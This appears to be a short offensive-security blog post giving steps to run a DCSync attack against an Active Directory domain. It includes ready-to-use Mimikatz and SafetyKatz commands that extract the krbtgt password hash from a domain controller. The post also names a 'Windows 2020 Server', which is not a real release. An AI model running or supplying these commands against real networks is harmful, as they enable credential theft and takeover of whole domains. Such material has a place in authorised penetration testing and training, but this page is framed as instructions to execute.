How to execute the DCSync Attack

Ad Attacks August 28, 2024

1 Min Read

Steps to execute:

To extract credentials from the DC without code execution on it, we can use DCSync
To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain
By default, Domain Admins privileges are required to run DCSync

# Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

# SafetyKatz
SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"

# SafetyKatz Old (For Windows 2020 Server)
SafetyKatz_old.exe "lsadump::dcsync /user:us\krbtgt" "exit"

Lateral Movement

Show Comments

How to execute the DCSync Attack

Leave a Reply Cancel reply

Other stories

How to abuse Unconstrained Delegation

How to extract LSASS credentials from Active Directory

How to abuse Unconstrained Delegation

Basic Domain Enumeration using PowerView

Press ESC to close

How to execute the DCSync Attack

Leave a Reply Cancel reply

You might also like

How to extract LSASS credentials from Active Directory

Other stories

How to abuse Unconstrained Delegation

How to extract LSASS credentials from Active Directory